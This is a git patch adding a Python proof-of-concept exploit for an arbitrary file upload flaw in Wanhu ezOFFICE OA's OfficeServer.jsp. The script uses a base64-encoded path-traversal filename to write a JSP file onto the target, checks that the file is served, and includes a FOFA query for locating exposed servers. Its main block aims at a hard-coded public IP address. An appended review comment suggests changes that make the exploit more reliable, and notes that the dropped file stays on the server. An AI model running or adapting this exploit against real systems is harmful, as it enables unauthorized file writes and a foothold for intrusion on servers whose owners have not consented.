From 9329a61eace616280c0442902398631cababab38 Mon Sep 17 00:00:00 2001
From: ZiYuMis <33992514+ZiYuMis@users.noreply.github.com>
Date: Tue, 27 Sep 2022 11:41:28 +0800
Subject: [PATCH] Add files via upload

---
 Moudle/OfficeServerFileUpload.py | 52 ++++++++++++++++++++++++++++++++
 1 file changed, 52 insertions(+)
 create mode 100644 Moudle/OfficeServerFileUpload.py

diff --git a/Moudle/OfficeServerFileUpload.py b/Moudle/OfficeServerFileUpload.py
new file mode 100644
index 0000000..2c1b248
--- /dev/null
+++ b/Moudle/OfficeServerFileUpload.py
@@ -0,0 +1,52 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+_/_/_/_/_/
+ _/ _/ _/_/ _/_/_/ _/_/_/
+ _/ _/_/ _/ _/ _/ _/ _/_/
+ _/ _/ _/ _/ _/ _/ _/_/
+_/ _/ _/_/_/ _/ _/ _/_/_/
+
+'''
+
+import json
+import requests
+#from Config.config_requests import ua
+
+
+# 脚本信息
+######################################################
+NAME='OfficeServerFileUpload'
+AUTHOR="Trans"
+REMARK='万户OA OfficeServer.jsp 任意文件上传漏洞'
+FOFA_RULE='app="万户网络-ezOFFICE"'
+######################################################
+
+def poc(target):
+ headers ={
+ "User-Agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
+ "Accept": "*/*",
+ "Accept-Encoding": "gzip, deflate"
+ }
+
+ try:
+ target2 = target+"/defaultroot/public/edit/cmd_test.jsp"
+ target += "/defaultroot/public/iWebOfficeSign/OfficeServer.jsp"
+ FileData = '<%= "hellowOrld"%>'
+ Body="DBSTEP=REJTVEVQ\r\nOPTION=U0FWRUZJTEU=\r\nRECORDID=\r\nisDoc=dHJ1ZQ==\r\nmoduleType=Z292ZG9jdW1lbnQ=\r\nFILETYPE=Li4vLi4vcHVibGljL2VkaXQvY21kX3Rlc3QuanNw\r\n111111111111111111111111111111111111111111111111\r\n"
+ Header="DBSTEP V3.0 "+str(len(Body)).ljust(16,' ') +"0 "+str(len(FileData)).ljust(16,' ')
+ r = requests.post(target ,headers = headers,data=Header+Body+FileData,verify=False,timeout=40)
+ r2 = requests.get(target2)
+ if r2.text == "hellowOrld":
+ print('[+] ' + target + ' 存在OfficeServer.jsp 任意文件上传漏洞')
+ #return ('[+] ' + target + ' 存在OfficeServer.jsp 任意文件上传漏洞')
+ except Exception as e:
+ pass
+
+def pocs(target,q):
+ q.put(target)
+ return poc(target)
+
+
+if __name__ == '__main__':
+ poc("http://183.129.227.222")
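Review bot: The verification request `r2 = requests.get(target2)` is sent without the `verify=False`, `timeout=40` and `headers` that the upload POST on the line above uses, so against an HTTPS host with a self-signed certificate it raises SSLError (and against a slow host it can hang indefinitely), and because `except Exception as e: pass` swallows everything the PoC then reports nothing even though cmd_test.jsp has already been written to the server. Align it with the POST, `r2 = requests.get(target2, headers=headers, verify=False, timeout=40)`, and compare `r2.text.strip() == "hellowOrld"` so that any trailing newline the JSP engine emits cannot produce a false negative. The bare `pass` should at least print the exception so a network or TLS failure is distinguishable from a non-vulnerable target. Separately, the script never removes the JSP it drops at /defaultroot/public/edit/cmd_test.jsp and the `__main__` block fires the upload at a hard-coded public IP, both of which deserve a warning comment in the module header (e.g. `# NOTE: writes cmd_test.jsp to the target and leaves it there; only run against hosts you are authorised to test`).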